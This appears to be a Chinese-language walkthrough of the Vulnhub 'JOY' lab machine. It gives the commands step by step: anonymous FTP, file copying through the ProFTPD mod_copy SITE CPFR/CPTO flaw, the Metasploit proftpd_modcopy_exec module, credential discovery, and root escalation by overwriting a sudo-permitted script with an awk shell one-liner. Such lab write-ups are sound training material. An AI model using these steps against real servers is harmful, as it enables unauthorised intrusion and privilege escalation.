Digitalworld.local: JOY Vulnhub靶場題解

前期準備

鏡像下載

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

環境配置:

在VM以net連接打開虛擬機

使用的機器:

攻擊機:kali linux,ubuntu
靶機:ip隨配(192.168.119.137)

滲透開始

1.nmap發現主機,並掃描其ip信息

nmap -A 192.168.119.137
在這裏插入圖片描述

2.發現ftp相關的知識,嘗試登陸ftp

ftp 192.168.119.137
賬號:anonymous
密碼:空
ls
cd download
ls
cd ..
cd upload
ls
get directory

在這裏插入圖片描述
退出ftp

cat directory
在這裏插入圖片描述
由於version_control存在於patrick路徑中,我們是沒有權限去獲取的,所以嘗試將其轉移到/upload路徑中

telnet 192.168.119.137 21
site cpfr /home/patrick/version_control
site cpto /home/upload/version_control

在這裏插入圖片描述

3.下載相關文件,發現版本漏洞

訪問路徑 ftp://192.168.119.137/upload/version_control
直接下載一個文件,打開
在這裏插入圖片描述

由上 proftpd的版本是存在漏洞的,並且告訴了webroot路徑,可以使用msf裏面的腳本攻擊

4.使用msf獲得shell,並嘗試提權

use exploit/unix/ftp/proftpd_modcopy_exec
set rhosts 192.168.119.137
set sitepath /var/www/tryingharderisjoy

在這裏插入圖片描述
python -c 'import pty; pty.spawn("/bin/bash")'

ls 
cd ossec
ls
cat patricksecretsofjoy

發現賬戶以及密碼
在這裏插入圖片描述

5.得到另一個賬號,嘗試提權

切換賬戶登陸
su -l patrick
在這裏插入圖片描述

6.將提權的腳本寫入對應的路徑中

可以看到在路徑 /home//patrick/script/test 是免密的
那我們可以嘗試上傳腳本文件到此路徑中
本地主機編寫腳本
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
使用ftp上傳到upload

cd upload
put test

在這裏插入圖片描述
在使用telnet轉換一下路徑

site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test

在這裏插入圖片描述

7.提權

sudo /home/patrick/script/test
cd /root
cat proof.txt
author-secret.txt

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章